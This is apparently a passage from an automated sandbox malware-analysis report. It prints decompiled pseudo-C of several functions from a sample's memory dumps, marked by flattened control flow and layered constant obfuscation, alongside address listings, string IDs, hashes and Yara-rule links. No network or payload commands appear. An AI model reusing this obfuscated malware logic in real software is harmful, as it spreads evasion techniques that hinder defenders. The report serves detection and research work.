									_t271 = _t271 + _t246;
									goto L1;
								}
							}
						}
					}
					goto L8;
					L21:
				} while (_t272 != 0x28759a70);
				goto L8;
			}














































                                          0x006d7f1f
                                          0x006d7f22
                                          0x006d7f2c
                                          0x006d7f34
                                          0x006d7f40
                                          0x006d7f42
                                          0x006d7f44
                                          0x006d7f48
                                          0x006d7f4d
                                          0x006d7f55
                                          0x006d7f60
                                          0x006d7f65
                                          0x006d7f6b
                                          0x006d7f73
                                          0x006d7f7b
                                          0x006d7f83
                                          0x006d7f8b
                                          0x006d7f93
                                          0x006d7f9b
                                          0x006d7fa0
                                          0x006d7fa8
                                          0x006d7fb0
                                          0x006d7fb8
                                          0x006d7fbd
                                          0x006d7fc7
                                          0x006d7fca
                                          0x006d7fce
                                          0x006d7fd6
                                          0x006d7fe6
                                          0x006d7fea
                                          0x006d7ff2
                                          0x006d7ffa
                                          0x006d8002
                                          0x006d800a
                                          0x006d8012
                                          0x006d801a
                                          0x006d8022
                                          0x006d802a
                                          0x006d8032
                                          0x006d803a
                                          0x006d8042
                                          0x006d804a
                                          0x006d8052
                                          0x006d805a
                                          0x006d8062
                                          0x006d8067
                                          0x006d806f
                                          0x006d8077
                                          0x006d807f
                                          0x006d8084
                                          0x006d808c
                                          0x006d8094
                                          0x006d80a0
                                          0x006d80a3
                                          0x006d80a7
                                          0x006d80af
                                          0x006d80b7
                                          0x006d80bf
                                          0x006d80c9
                                          0x006d80cd
                                          0x006d80d5
                                          0x006d80dd
                                          0x006d80e5
                                          0x006d80ed
                                          0x006d80f5
                                          0x006d810b
                                          0x006d810f
                                          0x006d8114
                                          0x006d811c
                                          0x006d8124
                                          0x006d8134
                                          0x006d8138
                                          0x006d8144
                                          0x006d8149
                                          0x006d814f
                                          0x006d8157
                                          0x006d8164
                                          0x006d8165
                                          0x006d8169
                                          0x006d8171
                                          0x006d8179
                                          0x006d8181
                                          0x006d8186
                                          0x006d818e
                                          0x006d8196
                                          0x006d819b
                                          0x006d81a3
                                          0x006d81ab
                                          0x006d81b3
                                          0x006d81bb
                                          0x006d81bf
                                          0x006d81c7
                                          0x006d81d4
                                          0x006d81dd
                                          0x006d81e1
                                          0x006d81e9
                                          0x006d81f6
                                          0x006d81fa
                                          0x006d8202
                                          0x006d820a
                                          0x006d8218
                                          0x006d821c
                                          0x006d821c
                                          0x006d8224
                                          0x006d8224
                                          0x006d8224
                                          0x006d8224
                                          0x006d8226
                                          0x00000000
                                          0x00000000
                                          0x006d822c
                                          0x006d82c7
                                          0x006d82c8
                                          0x006d82cd
                                          0x006d82d0
                                          0x006d82d5
                                          0x00000000
                                          0x006d8232
                                          0x006d8238
                                          0x006d82b5
                                          0x00000000
                                          0x006d823a
                                          0x006d8240
                                          0x006d829d
                                          0x006d82a1
                                          0x006d82a6
                                          0x006d82a9
                                          0x006d82ae
                                          0x00000000
                                          0x006d8242
                                          0x006d8248
                                          0x006d827b
                                          0x006d827c
                                          0x006d8281
                                          0x006d8284
                                          0x006d8289
                                          0x00000000
                                          0x006d824a
                                          0x006d8250
                                          0x00000000
                                          0x006d8256
                                          0x006d825e
                                          0x006d8267
                                          0x006d8267
                                          0x006d8250
                                          0x006d8248
                                          0x006d8240
                                          0x006d8238
                                          0x006d8269
                                          0x006d8272
                                          0x006d8272
                                          0x006d82e2
                                          0x006d8368
                                          0x006d836c
                                          0x006d8371
                                          0x006d8374
                                          0x006d8379
                                          0x00000000
                                          0x006d82e4
                                          0x006d82ea
                                          0x006d8346
                                          0x006d8347
                                          0x006d834c
                                          0x006d834f
                                          0x006d8351
                                          0x00000000
                                          0x006d82ec
                                          0x006d82f2
                                          0x006d8326
                                          0x006d832a
                                          0x006d832f
                                          0x006d8332
                                          0x006d8337
                                          0x00000000
                                          0x006d82f4
                                          0x006d82fa
                                          0x00000000
                                          0x006d82fc
                                          0x006d8304
                                          0x006d8305
                                          0x006d830a
                                          0x006d830d
                                          0x006d8312
                                          0x00000000
                                          0x006d8312
                                          0x006d82fa
                                          0x006d82f2
                                          0x006d82ea
                                          0x00000000
                                          0x006d837b
                                          0x006d837b
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ,H$9c%'$9c%'$S,$XW$bh$~
                                          • API String ID: 0-4263808623
                                          • Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                          • Instruction ID: 0d63a368c1bccab6efd3681f5ee91a14f9314da521f5f4085ff77b8b7a82897d
                                          • Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                          • Instruction Fuzzy Hash: 40B121B29093808FD358CF25D98A40BFBE2BB85744F40891EF58697260D7B5DA09CF87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C69A0, Relevance: 9.0, Strings: 7, Instructions: 215COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006C69A0(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* __edi;
				void* __ebp;
				void* _t182;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr* _t193;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;
				void* _t218;
				intOrPtr _t222;
				void* _t223;
				intOrPtr _t227;
				signed int* _t228;

				_t228 =  &_v84;
				_v8 = 0x71163c;
				_t222 = 0;
				_t193 = __edx;
				_v4 = 0;
				_v44 = 0xc562;
				_t227 = __ecx;
				_v44 = _v44 >> 2;
				_t223 = 0xa9ba57f;
				_v44 = _v44 ^ 0x8749252f;
				_v44 = _v44 ^ 0x87491d9f;
				_v16 = 0x2187;
				_v16 = _v16 + 0x9003;
				_v16 = _v16 ^ 0x00009583;
				_v64 = 0x884c;
				_v64 = _v64 ^ 0x157bb051;
				_t195 = 0x5b;
				_v64 = _v64 / _t195;
				_v64 = _v64 + 0xffffc6fd;
				_v64 = _v64 ^ 0x003c6beb;
				_v76 = 0xc2af;
				_t196 = 0x62;
				_v76 = _v76 / _t196;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0xffffe747;
				_v76 = _v76 ^ 0x000fbc5b;
				_v20 = 0xd86f;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x06c32379;
				_v24 = 0x5847;
				_v24 = _v24 ^ 0xbe016602;
				_v24 = _v24 ^ 0xbe0159ab;
				_v56 = 0x8b9e;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x62eb1469;
				_v56 = _v56 ^ 0x62609790;
				_v60 = 0xc8f5;
				_v60 = _v60 | 0xe944ef36;
				_v60 = _v60 ^ 0xbc6be2e2;
				_v60 = _v60 ^ 0x552f2627;
				_v84 = 0x43ed;
				_v84 = _v84 ^ 0x08a0b069;
				_v84 = _v84 | 0x0c951c83;
				_v84 = _v84 + 0x562e;
				_v84 = _v84 ^ 0x0cb6752c;
				_v48 = 0x4b81;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0xffff2892;
				_v48 = _v48 ^ 0xffff31fe;
				_v80 = 0x3016;
				_v80 = _v80 + 0x7dde;
				_v80 = _v80 << 0xf;
				_t197 = 0x36;
				_v80 = _v80 / _t197;
				_v80 = _v80 ^ 0x019c7f33;
				_v52 = 0xfd2;
				_v52 = _v52 + 0xffff2d18;
				_v52 = _v52 + 0x6a3f;
				_v52 = _v52 ^ 0xffffabb5;
				_v28 = 0xa77b;
				_v28 = _v28 ^ 0xae749dbd;
				_v28 = _v28 ^ 0xae743f32;
				_v32 = 0xf75f;
				_v32 = _v32 | 0x58371397;
				_v32 = _v32 ^ 0x5837ee79;
				_v68 = 0x3d22;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 << 0xf;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00007889;
				_v72 = 0xcbcf;
				_v72 = _v72 | 0x3a65856e;
				_v72 = _v72 + 0xdb4;
				_v72 = _v72 | 0x1789f940;
				_v72 = _v72 ^ 0x3feda3a8;
				_v36 = 0x2389;
				_v36 = _v36 * 0x4b;
				_v36 = _v36 | 0x61940fa3;
				_v36 = _v36 ^ 0x619e1b1f;
				_v40 = 0xa903;
				_v40 = _v40 + 0x4cf2;
				_v40 = _v40 | 0xc82713d6;
				_v40 = _v40 ^ 0xc827b671;
				_v12 = 0xc1c;
				_v12 = _v12 ^ 0x8bcf36f0;
				_v12 = _v12 ^ 0x8bcf5121;
				while(1) {
					L1:
					_t198 = 0x374e1c43;
					_t182 = 0x15aea868;
					L2:
					while(1) {
						do {
							if(_t223 == 0xa9ba57f) {
								_push(_t198);
								_push(_t198);
								_t199 = 0x38;
								_t222 = E006C8736(_t199);
								__eflags = _t222;
								if(__eflags == 0) {
									_t223 = 0x3a1f14a3;
									_t182 = 0x15aea868;
									_t198 = 0x374e1c43;
									_t218 = 0x28fd42b4;
									goto L19;
								}
								_t223 = 0x2094e6da;
								L15:
								_t182 = 0x15aea868;
								L11:
								_t198 = 0x374e1c43;
								L12:
								_t218 = 0x28fd42b4;
								continue;
							}
							if(_t223 == 0xb1cacb5) {
								return E006CF536(_v36, _v40, _v12, _t222);
							}
							if(_t223 == _t182) {
								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
								_t188 =  *0x6dca24; // 0x0
								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
								 *0x6dca24 = _t222;
								return _t188;
							}
							if(_t223 == 0x16c9d000) {
								E006D422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
								_t223 = 0xb1cacb5;
								goto L15;
							}
							if(_t223 == 0x2094e6da) {
								_push(_v24);
								_t190 = E006D6DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
								_t228 =  &(_t228[5]);
								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
								__eflags = _t190;
								_t198 = 0x374e1c43;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
								goto L12;
							}
							if(_t223 == _t218) {
								_push(_t198);
								_t191 = E006C1132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E006D9586);
								_t228 =  &(_t228[9]);
								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
								__eflags = _t191;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
								goto L11;
							}
							if(_t223 != _t198) {
								goto L19;
							}
							_t192 = E006C76DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
							_t228 =  &(_t228[2]);
							 *((intOrPtr*)(_t222 + 4)) = _t192;
							_t218 = 0x28fd42b4;
							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
							goto L1;
							L19:
							__eflags = _t223 - 0x3a1f14a3;
						} while (__eflags != 0);
						return _t182;
					}
				}
			}










































                                          0x006c69a0
                                          0x006c69a3
                                          0x006c69af
                                          0x006c69b1
                                          0x006c69b3
                                          0x006c69b9
                                          0x006c69c1
                                          0x006c69c3
                                          0x006c69c8
                                          0x006c69cd
                                          0x006c69d5
                                          0x006c69dd
                                          0x006c69e5
                                          0x006c69ed
                                          0x006c69f5
                                          0x006c69fd
                                          0x006c6a0b
                                          0x006c6a10
                                          0x006c6a16
                                          0x006c6a1e
                                          0x006c6a26
                                          0x006c6a32
                                          0x006c6a37
                                          0x006c6a3d
                                          0x006c6a42
                                          0x006c6a4a
                                          0x006c6a52
                                          0x006c6a5a
                                          0x006c6a5f
                                          0x006c6a67
                                          0x006c6a6f
                                          0x006c6a77
                                          0x006c6a7f
                                          0x006c6a87
                                          0x006c6a8c
                                          0x006c6a94
                                          0x006c6a9c
                                          0x006c6aa4
                                          0x006c6aac
                                          0x006c6ab4
                                          0x006c6abc
                                          0x006c6ac4
                                          0x006c6acc
                                          0x006c6ad4
                                          0x006c6adc
                                          0x006c6ae4
                                          0x006c6aec
                                          0x006c6af1
                                          0x006c6af9
                                          0x006c6b01
                                          0x006c6b09
                                          0x006c6b11
                                          0x006c6b1a
                                          0x006c6b1d
                                          0x006c6b21
                                          0x006c6b29
                                          0x006c6b31
                                          0x006c6b39
                                          0x006c6b41
                                          0x006c6b49
                                          0x006c6b51
                                          0x006c6b59
                                          0x006c6b61
                                          0x006c6b69
                                          0x006c6b71
                                          0x006c6b79
                                          0x006c6b81
                                          0x006c6b8b
                                          0x006c6b90
                                          0x006c6b95
                                          0x006c6b9d
                                          0x006c6ba5
                                          0x006c6bad
                                          0x006c6bb5
                                          0x006c6bbd
                                          0x006c6bc5
                                          0x006c6bd2
                                          0x006c6bd6
                                          0x006c6bde
                                          0x006c6be6
                                          0x006c6bee
                                          0x006c6bf6
                                          0x006c6bfe
                                          0x006c6c06
                                          0x006c6c0e
                                          0x006c6c16
                                          0x006c6c1e
                                          0x006c6c1e
                                          0x006c6c1e
                                          0x006c6c23
                                          0x00000000
                                          0x006c6c28
                                          0x006c6c28
                                          0x006c6c2e
                                          0x006c6d35
                                          0x006c6d36
                                          0x006c6d39
                                          0x006c6d3f
                                          0x006c6d43
                                          0x006c6d45
                                          0x006c6d4e
                                          0x006c6d53
                                          0x006c6d58
                                          0x006c6d5d
                                          0x00000000
                                          0x006c6d5d
                                          0x006c6d47
                                          0x006c6d22
                                          0x006c6d22
                                          0x006c6cca
                                          0x006c6cca
                                          0x006c6ccf
                                          0x006c6ccf
                                          0x00000000
                                          0x006c6ccf
                                          0x006c6c3a
                                          0x00000000
                                          0x006c6d96
                                          0x006c6c42
                                          0x006c6d70
                                          0x006c6d73
                                          0x006c6d78
                                          0x006c6d7b
                                          0x00000000
                                          0x006c6d7b
                                          0x006c6c4e
                                          0x006c6d17
                                          0x006c6d1d
                                          0x00000000
                                          0x006c6d1d
                                          0x006c6c5a
                                          0x006c6cd9
                                          0x006c6ceb
                                          0x006c6cf0
                                          0x006c6cf3
                                          0x006c6cf6
                                          0x006c6cfd
                                          0x006c6d02
                                          0x006c6d07
                                          0x00000000
                                          0x006c6d07
                                          0x006c6c5e
                                          0x006c6c93
                                          0x006c6cb0
                                          0x006c6cb5
                                          0x006c6cb8
                                          0x006c6cbb
                                          0x006c6cc2
                                          0x006c6cc7
                                          0x00000000
                                          0x006c6cc7
                                          0x006c6c62
                                          0x00000000
                                          0x00000000
                                          0x006c6c77
                                          0x006c6c7c
                                          0x006c6c7f
                                          0x006c6c89
                                          0x006c6c8e
                                          0x00000000
                                          0x006c6d62
                                          0x006c6d62
                                          0x006c6d62
                                          0x00000000
                                          0x006c6c28
                                          0x006c6c28

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "=$'&/U$.V$?j$GX$y7X$k<
                                          • API String ID: 0-2482092835
                                          • Opcode ID: 665f55d5710a7f3f819e77403ff5a5da3e373029e71b086fe1736a6c11b96f37
                                          • Instruction ID: f50be755f97ba3387db28804a7c2cb2dbc41a32f1bc22e0116ced8137e34f972
                                          • Opcode Fuzzy Hash: 665f55d5710a7f3f819e77403ff5a5da3e373029e71b086fe1736a6c11b96f37
                                          • Instruction Fuzzy Hash: ACA18572908341AFD358CF25C58A91BFBE2FBD4354F408A1DF48A96260D7B5D90ACF46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C1280, Relevance: 7.7, Strings: 6, Instructions: 157COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E006C1280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t124;
				void* _t136;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				void* _t149;
				void* _t170;
				void* _t172;
				void* _t173;

				_push(_a16);
				_t169 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t124);
				_v112 = 0x527a;
				_t173 = _t172 + 0x18;
				_v112 = _v112 + 0x9ab3;
				_t170 = 0;
				_t149 = 0x18640a1d;
				_t144 = 0x56;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0028d5a0;
				_v84 = 0xce56;
				_v84 = _v84 | 0x89224a79;
				_v84 = _v84 ^ 0x8922db02;
				_v124 = 0x8cd1;
				_v124 = _v124 ^ 0x879587c2;
				_v124 = _v124 | 0xdff4f7f6;
				_v124 = _v124 ^ 0xdff58592;
				_v80 = 0x5082;
				_v80 = _v80 * 5;
				_v80 = _v80 ^ 0x0001dd7a;
				_v100 = 0x94cc;
				_v100 = _v100 >> 1;
				_v100 = _v100 + 0xc5d3;
				_v100 = _v100 ^ 0x0001674a;
				_v104 = 0x7528;
				_v104 = _v104 | 0x4afc80c9;
				_v104 = _v104 * 0x41;
				_v104 = _v104 ^ 0x0a3a6635;
				_v108 = 0x5a30;
				_v108 = _v108 >> 6;
				_t145 = 0x51;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x00000b43;
				_v128 = 0x7a75;
				_v128 = _v128 ^ 0x183e3e2b;
				_v128 = _v128 >> 0xe;
				_v128 = _v128 << 1;
				_v128 = _v128 ^ 0x0000b567;
				_v88 = 0xd0b6;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0x0003606d;
				_v92 = 0x29e5;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0x29e559c0;
				_v116 = 0xa20c;
				_v116 = _v116 / _t145;
				_v116 = _v116 << 1;
				_v116 = _v116 ^ 0x00003b63;
				_v120 = 0xbe93;
				_v120 = _v120 | 0x1a4ed6db;
				_v120 = _v120 + 0xa009;
				_v120 = _v120 + 0xfffff07c;
				_v120 = _v120 ^ 0x1a4feb5f;
				_v96 = 0x4975;
				_t146 = 0x2b;
				_v96 = _v96 * 0x31;
				_v96 = _v96 / _t146;
				_v96 = _v96 ^ 0x000025f7;
				do {
					while(_t149 != 0x1a9c3b7) {
						if(_t149 == 0xb87d72f) {
							__eflags = E006CB055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
							_t170 =  !=  ? 1 : _t170;
						} else {
							if(_t149 == 0x18640a1d) {
								_t149 = 0x1a19e858;
								continue;
							} else {
								if(_t149 == 0x1a19e858) {
									E006D50F2( &_v76, _v112, _v84, _v124, _a12);
									_t173 = _t173 + 0xc;
									_t149 = 0x1a9c3b7;
									continue;
								} else {
									if(_t149 != 0x2b3c78b1) {
										goto L13;
									} else {
										_t143 = E006D8F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
										_t173 = _t173 + 0x10;
										if(_t143 != 0) {
											_t149 = 0xb87d72f;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t170;
					}
					_t136 = E006D8F11( &_v76, _v80, _v100, _t169, _v104, _v108);
					_t173 = _t173 + 0x10;
					__eflags = _t136;
					if(__eflags == 0) {
						_t149 = 0x1a747795;
						goto L13;
					} else {
						_t149 = 0x2b3c78b1;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t149 - 0x1a747795;
				} while (__eflags != 0);
				goto L16;
			}



























                                          0x006c128a
                                          0x006c1291
                                          0x006c1298
                                          0x006c129f
                                          0x006c12a0
                                          0x006c12a7
                                          0x006c12a8
                                          0x006c12a9
                                          0x006c12ae
                                          0x006c12b6
                                          0x006c12b9
                                          0x006c12c8
                                          0x006c12ca
                                          0x006c12d1
                                          0x006c12d4
                                          0x006c12d8
                                          0x006c12e0
                                          0x006c12e8
                                          0x006c12f0
                                          0x006c12f8
                                          0x006c1300
                                          0x006c1308
                                          0x006c1310
                                          0x006c1318
                                          0x006c1325
                                          0x006c1329
                                          0x006c1331
                                          0x006c1339
                                          0x006c133d
                                          0x006c1345
                                          0x006c134d
                                          0x006c1355
                                          0x006c1362
                                          0x006c1366
                                          0x006c136e
                                          0x006c1376
                                          0x006c1381
                                          0x006c1382
                                          0x006c1388
                                          0x006c1390
                                          0x006c1398
                                          0x006c13a0
                                          0x006c13a5
                                          0x006c13a9
                                          0x006c13b1
                                          0x006c13b9
                                          0x006c13be
                                          0x006c13c6
                                          0x006c13ce
                                          0x006c13d3
                                          0x006c13db
                                          0x006c13eb
                                          0x006c13ef
                                          0x006c13f3
                                          0x006c13fb
                                          0x006c1403
                                          0x006c140b
                                          0x006c1413
                                          0x006c141b
                                          0x006c1423
                                          0x006c1432
                                          0x006c1433
                                          0x006c1447
                                          0x006c144b
                                          0x006c1453
                                          0x006c1453
                                          0x006c145d
                                          0x006c152a
                                          0x006c152c
                                          0x006c1463
                                          0x006c1469
                                          0x006c14cd
                                          0x00000000
                                          0x006c146b
                                          0x006c146d
                                          0x006c14be
                                          0x006c14c3
                                          0x006c14c6
                                          0x00000000
                                          0x006c146f
                                          0x006c1475
                                          0x00000000
                                          0x006c147b
                                          0x006c1493
                                          0x006c1498
                                          0x006c149d
                                          0x006c14a3
                                          0x00000000
                                          0x006c14a3
                                          0x006c149d
                                          0x006c1475
                                          0x006c146d
                                          0x006c1469
                                          0x006c1530
                                          0x006c153b
                                          0x006c153b
                                          0x006c14e6
                                          0x006c14eb
                                          0x006c14ee
                                          0x006c14f0
                                          0x006c14fc
                                          0x00000000
                                          0x006c14f2
                                          0x006c14f2
                                          0x00000000
                                          0x006c14f2
                                          0x00000000
                                          0x006c1501
                                          0x006c1501
                                          0x006c1501
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0Z$5f:$c;$uI$uz$zR
                                          • API String ID: 0-4070947617
                                          • Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                          • Instruction ID: 39970c49a210dd50179e8881ebb1ff1cba8162616cdbbeb3edfb401f8dfceded
                                          • Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                          • Instruction Fuzzy Hash: DC616871109341AFD758CF20C98592FBBF2FBC6748F80991DF196862A1D779CA098B47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C17AC, Relevance: 7.7, Strings: 6, Instructions: 157COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E006C17AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* __ecx;
				void* _t124;
				intOrPtr _t144;
				void* _t148;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				signed int* _t175;

				_push(_a20);
				_push(1);
				_push(1);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E006C602B(_t124);
				_v48 = 0x839b;
				_t175 =  &(( &_v52)[7]);
				_t172 = 0;
				_t148 = 0xc9f1fee;
				_t167 = 0x65;
				_v48 = _v48 / _t167;
				_v48 = _v48 + 0xffff5433;
				_t168 = 0x4c;
				_v48 = _v48 / _t168;
				_v48 = _v48 ^ 0x035e614e;
				_v52 = 0x7a24;
				_t169 = 0x57;
				_v52 = _v52 * 0x3d;
				_v52 = _v52 / _t169;
				_v52 = _v52 | 0x143fc393;
				_v52 = _v52 ^ 0x143ff5ea;
				_v32 = 0x6195;
				_v32 = _v32 ^ 0x160f1dee;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x2c1ed936;
				_v44 = 0xc7f4;
				_v44 = _v44 + 0xffff31e5;
				_v44 = _v44 | 0xcdfc86d8;
				_v44 = _v44 + 0xffff4cbe;
				_v44 = _v44 ^ 0xffff1878;
				_v12 = 0x3e0d;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x0003ab13;
				_v24 = 0xe2a2;
				_t170 = 0x4a;
				_v24 = _v24 * 0x7d;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0006fa2b;
				_v16 = 0xd6eb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x0000394e;
				_v40 = 0x5ece;
				_v40 = _v40 * 0x43;
				_v40 = _v40 / _t170;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x000003d1;
				_v28 = 0xdfec;
				_v28 = _v28 >> 6;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x001be0b4;
				_v20 = 0x73b;
				_v20 = _v20 ^ 0xd6615083;
				_v20 = _v20 ^ 0xd6610707;
				_v36 = 0x46b8;
				_v36 = _v36 | 0xf1966772;
				_v36 = _v36 ^ 0x374c3a36;
				_v36 = _v36 * 0x27;
				_v36 = _v36 ^ 0x4b440184;
				_v8 = 0xd697;
				_v8 = _v8 ^ 0x6f8084df;
				_v8 = _v8 ^ 0x6f807f26;
				_t171 = _v4;
				while(_t148 != 0x24e4c4b) {
					if(_t148 == 0xc9f1fee) {
						_t148 = 0x3ad8e818;
						continue;
					} else {
						if(_t148 == 0x1ffca7a2) {
							E006D1AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
							_t175 =  &(_t175[0xa]);
							_t148 = 0x24e4c4b;
							_t172 =  !=  ? 1 : _t172;
							continue;
						} else {
							if(_t148 == 0x34494570) {
								if(E006D0729(_v32,  &_v4, _v44, _t171) != 0) {
									_t148 = 0x1ffca7a2;
									continue;
								}
							} else {
								if(_t148 != 0x3ad8e818) {
									L13:
									if(_t148 != 0x2a0664e6) {
										continue;
									}
								} else {
									_t144 = E006CF6DF(_t148);
									_t171 = _t144;
									if(_t144 != 0xffffffff) {
										_t148 = 0x34494570;
										continue;
									}
								}
							}
						}
					}
					return _t172;
				}
				E006D4F7D(_v36, _v8, _v4);
				_t148 = 0x2a0664e6;
				goto L13;
			}


























                                          0x006c17b3
                                          0x006c17ba
                                          0x006c17bb
                                          0x006c17bc
                                          0x006c17c0
                                          0x006c17c4
                                          0x006c17c6
                                          0x006c17cb
                                          0x006c17d3
                                          0x006c17dc
                                          0x006c17de
                                          0x006c17e5
                                          0x006c17ea
                                          0x006c17f0
                                          0x006c17fc
                                          0x006c1801
                                          0x006c1807
                                          0x006c180f
                                          0x006c181c
                                          0x006c181f
                                          0x006c182b
                                          0x006c182f
                                          0x006c1837
                                          0x006c183f
                                          0x006c1847
                                          0x006c184f
                                          0x006c1853
                                          0x006c185b
                                          0x006c1863
                                          0x006c186b
                                          0x006c1873
                                          0x006c187b
                                          0x006c1883
                                          0x006c188b
                                          0x006c1890
                                          0x006c1898
                                          0x006c18a5
                                          0x006c18a6
                                          0x006c18aa
                                          0x006c18af
                                          0x006c18b7
                                          0x006c18bf
                                          0x006c18c4
                                          0x006c18cc
                                          0x006c18d9
                                          0x006c18e3
                                          0x006c18e7
                                          0x006c18ec
                                          0x006c18f4
                                          0x006c18fc
                                          0x006c1901
                                          0x006c1906
                                          0x006c190e
                                          0x006c1916
                                          0x006c191e
                                          0x006c1926
                                          0x006c1933
                                          0x006c193b
                                          0x006c1948
                                          0x006c194c
                                          0x006c1954
                                          0x006c195c
                                          0x006c1964
                                          0x006c196c
                                          0x006c1970
                                          0x006c1982
                                          0x006c1a1a
                                          0x00000000
                                          0x006c1988
                                          0x006c198a
                                          0x006c1a03
                                          0x006c1a08
                                          0x006c1a0b
                                          0x006c1a12
                                          0x00000000
                                          0x006c198c
                                          0x006c1992
                                          0x006c19d5
                                          0x006c19d7
                                          0x00000000
                                          0x006c19d7
                                          0x006c1994
                                          0x006c199a
                                          0x006c1a3b
                                          0x006c1a41
                                          0x00000000
                                          0x00000000
                                          0x006c19a0
                                          0x006c19a8
                                          0x006c19ad
                                          0x006c19b2
                                          0x006c19b8
                                          0x00000000
                                          0x006c19b8
                                          0x006c19b2
                                          0x006c199a
                                          0x006c1992
                                          0x006c198a
                                          0x006c1a50
                                          0x006c1a50
                                          0x006c1a30
                                          0x006c1a36
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
